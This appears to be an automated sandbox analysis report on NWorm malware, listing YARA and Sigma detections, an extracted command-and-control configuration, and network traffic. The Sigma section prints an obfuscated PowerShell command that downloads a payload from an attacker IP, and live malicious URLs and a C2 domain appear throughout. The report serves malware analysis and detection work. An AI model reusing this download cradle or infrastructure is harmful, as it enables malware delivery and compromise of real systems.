2.2.powershell.exe.1ad00d7d970.3.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x793:$id1: N-W0rm 0x144f:$x1: pongPing 0x1461:$x2: \|NW\| 0x1078:$s1: runFile 0x1088:$s2: runUrl 0x10d8:$s3: killer 0x10f8:$s4: powershell 0x12b4:$s5: wscript.exe 0x1110:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x12cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x13ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
2.2.powershell.exe.1ad00a6df58.2.raw.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
2.2.powershell.exe.1ad00a6df58.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2ff4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3058:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3050:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
2.2.powershell.exe.1ad00a6df58.2.raw.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f8c:$id1: N-W0rm 0x2593:$id1: N-W0rm 0x324f:$x1: pongPing 0x3261:$x2: \|NW\| 0x2e78:$s1: runFile 0x2e88:$s2: runUrl 0x2ed8:$s3: killer 0x2ef8:$s4: powershell 0x4b82:$s4: powershell 0x8a7a:$s4: powershell 0x30b4:$s5: wscript.exe 0x2f10:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
7.0.aspnet_regbrowsers.exe.400000.4.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
7.0.aspnet_regbrowsers.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2ff4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3058:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3050:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
7.0.aspnet_regbrowsers.exe.400000.4.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f8c:$id1: N-W0rm 0x2593:$id1: N-W0rm 0x324f:$x1: pongPing 0x3261:$x2: \|NW\| 0x2e78:$s1: runFile 0x2e88:$s2: runUrl 0x2ed8:$s3: killer 0x2ef8:$s4: powershell 0x30b4:$s5: wscript.exe 0x2f10:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
2.2.powershell.exe.1ad005bda68.1.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
2.2.powershell.exe.1ad005bda68.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x11f4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1258:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1250:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
2.2.powershell.exe.1ad005bda68.1.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x793:$id1: N-W0rm 0x144f:$x1: pongPing 0x1461:$x2: \|NW\| 0x1078:$s1: runFile 0x1088:$s2: runUrl 0x10d8:$s3: killer 0x10f8:$s4: powershell 0x12b4:$s5: wscript.exe 0x1110:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x12cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x13ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
2.2.powershell.exe.1ad00d7d970.3.raw.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
2.2.powershell.exe.1ad00d7d970.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2ff4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3058:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3050:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
2.2.powershell.exe.1ad00d7d970.3.raw.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f8c:$id1: N-W0rm 0x2593:$id1: N-W0rm 0x324f:$x1: pongPing 0x3261:$x2: \|NW\| 0x2e78:$s1: runFile 0x2e88:$s2: runUrl 0x2ed8:$s3: killer 0x2ef8:$s4: powershell 0x30b4:$s5: wscript.exe 0x2f10:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
7.0.aspnet_regbrowsers.exe.400000.1.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
7.0.aspnet_regbrowsers.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2ff4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3058:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3050:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
7.0.aspnet_regbrowsers.exe.400000.1.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f8c:$id1: N-W0rm 0x2593:$id1: N-W0rm 0x324f:$x1: pongPing 0x3261:$x2: \|NW\| 0x2e78:$s1: runFile 0x2e88:$s2: runUrl 0x2ed8:$s3: killer 0x2ef8:$s4: powershell 0x30b4:$s5: wscript.exe 0x2f10:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
7.0.aspnet_regbrowsers.exe.400000.0.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
7.0.aspnet_regbrowsers.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2ff4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3058:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3050:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
7.0.aspnet_regbrowsers.exe.400000.0.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f8c:$id1: N-W0rm 0x2593:$id1: N-W0rm 0x324f:$x1: pongPing 0x3261:$x2: \|NW\| 0x2e78:$s1: runFile 0x2e88:$s2: runUrl 0x2ed8:$s3: killer 0x2ef8:$s4: powershell 0x30b4:$s5: wscript.exe 0x2f10:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
7.0.aspnet_regbrowsers.exe.400000.3.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
7.0.aspnet_regbrowsers.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2ff4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3058:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3050:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
7.0.aspnet_regbrowsers.exe.400000.3.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f8c:$id1: N-W0rm 0x2593:$id1: N-W0rm 0x324f:$x1: pongPing 0x3261:$x2: \|NW\| 0x2e78:$s1: runFile 0x2e88:$s2: runUrl 0x2ed8:$s3: killer 0x2ef8:$s4: powershell 0x30b4:$s5: wscript.exe 0x2f10:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
2.2.powershell.exe.1ad005bda68.1.raw.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
2.2.powershell.exe.1ad005bda68.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x2ff4:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3058:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x3050:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
2.2.powershell.exe.1ad005bda68.1.raw.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x1f8c:$id1: N-W0rm 0x2593:$id1: N-W0rm 0x324f:$x1: pongPing 0x3261:$x2: \|NW\| 0x2e78:$s1: runFile 0x2e88:$s2: runUrl 0x2ed8:$s3: killer 0x2ef8:$s4: powershell 0x90a3a:$s4: powershell 0x30b4:$s5: wscript.exe 0x2f10:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x30cd:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x31ef:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
2.2.powershell.exe.1ad005a9550.0.raw.unpack	JoeSecurity_NWorm	Yara detected NWorm	Joe Security
2.2.powershell.exe.1ad005a9550.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x1750c:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x17570:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x17568:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
2.2.powershell.exe.1ad005a9550.0.raw.unpack	MALWARE_Win_NWorm	Detects NWorm/N-W0rm payload	ditekSHen	0x164a4:$id1: N-W0rm 0x16aab:$id1: N-W0rm 0x17767:$x1: pongPing 0x17779:$x2: \|NW\| 0x17390:$s1: runFile 0x173a0:$s2: runUrl 0x173f0:$s3: killer 0x17410:$s4: powershell 0xa4f52:$s4: powershell 0x175cc:$s5: wscript.exe 0x17428:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File " 0x175e5:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 0x17707:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
Click to see the 31 entries

Sigma Overview

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentProcessId: 4584, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" , ProcessId: 6520

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentProcessId: 4584, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" , ProcessId: 6520

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, ParentProcessId: 4584, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\tmpCECD.tmp1991-10-12-2021.js" , ProcessId: 6520

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/C/Ps1JDK.txt';Function RRBP([string] $KUFB) {$sFKU = [system.Collections.Generic.list[Byte]]::new();for ($AHYV = 0; $AHYV -lt $KUFB.lengtH; $AHYV +=8) {$sFKU.Add([Convert]::ToByte($KUFB.substring($AHYV, 8), 2))}return [system.Text.encoding]::AsCII.Getstring($sFKU.ToArray())};$eZHV = RRBP 'OWUT1OWUT11OWUT11OWUT111OWUTOWUT11OWUT111OWUT1OWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUT1OWUTOWUT111OWUTOWUT1OWUTOWUTOWUT111OWUT1OWUT111OWUT1OWUTOWUT111OWUT1OWUTOWUTOWUT111OWUT1OWUTOWUT11OWUT1OWUT1OWUTOWUT11OWUT1111OWUT1OWUTOWUT1OWUTOWUT1OWUT11OWUT111OWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT11OWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOW

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://103.151.125.186/C/Ps1JDK.txt';Function RRBP([string] $KUFB) {$sFKU = [system.Collections.Generic.list[Byte]]::new();for ($AHYV = 0; $AHYV -lt $KUFB.lengtH; $AHYV +=8) {$sFKU.Add([Convert]::ToByte($KUFB.substring($AHYV, 8), 2))}return [system.Text.encoding]::AsCII.Getstring($sFKU.ToArray())};$eZHV = RRBP 'OWUT1OWUT11OWUT11OWUT111OWUTOWUT11OWUT111OWUT1OWUTOWUTOWUT1OWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUTOWUT1OWUT1OWUTOWUT111OWUTOWUT1OWUTOWUTOWUT111OWUT1OWUT111OWUT1OWUTOWUT111OWUT1OWUTOWUTOWUT111OWUT1OWUTOWUT11OWUT1OWUT1OWUTOWUT11OWUT1111OWUT1OWUTOWUT1OWUTOWUT1OWUT11OWUT111OWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUTOWUT111OWUTOWUT1OWUTOWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT1OWUT1OWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT11OWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT11OWUT111OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT1OWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUTOWUTOWUTOWUT11OWUTOWUT1OWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT111OWUTOWUT1OWUTOWUT11OWUT11OWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUT11OWUTOWUT1OWUT11OWUTOWUTOWUTOWUT11OWUT111OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT1OWUT11OWUTOWUTOWUTOWUT1OWUTOWUTOWUTOWUTOWUTOWUTOWUT11OWUTOWUTOWUT1OWUTOWUT11OWUTOWUTOWUTOWUTOWUTOWUT11OWUT1OWUT1OWUTOWUT1OWUT11OWUTOWUTOW

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132882430679450692.7064.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 2.2.powershell.exe.1ad00d7d970.3.raw.unpack

Malware Configuration Extractor: NWorm {"Host": "moneyhope81.duckdns.org", "Port": "5052", "Mutex": "a22a16ad", "Version": "v0.3.8", "Network Seprator": "|NW|"}

Antivirus detection for URL or domain

Source: HttP://103.151.125.186/A/XADOUYJBEAAKTPUBATDKPHHPFWQWHBJ	Avira URL Cloud: Label: malware
Source: http://103.151.125.186/C/Serverjdkd.txt	Avira URL Cloud: Label: malware
Source: http://103.151.125.186/C/Ps1JDK.txt	Avira URL Cloud: Label: malware
Source: http://103.151.125.186	Avira URL Cloud: Label: malware

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View	ASN Name: M247GB M247GB

Source: global traffic	HTTP traffic detected: GET /C/Ps1JDK.txt HTTP/1.1Host: 103.151.125.186Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /C/Serverjdkd.txt HTTP/1.1Host: 103.151.125.186

Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
Source: unknown	TCP traffic detected without corresponding DNS query: 103.151.125.186
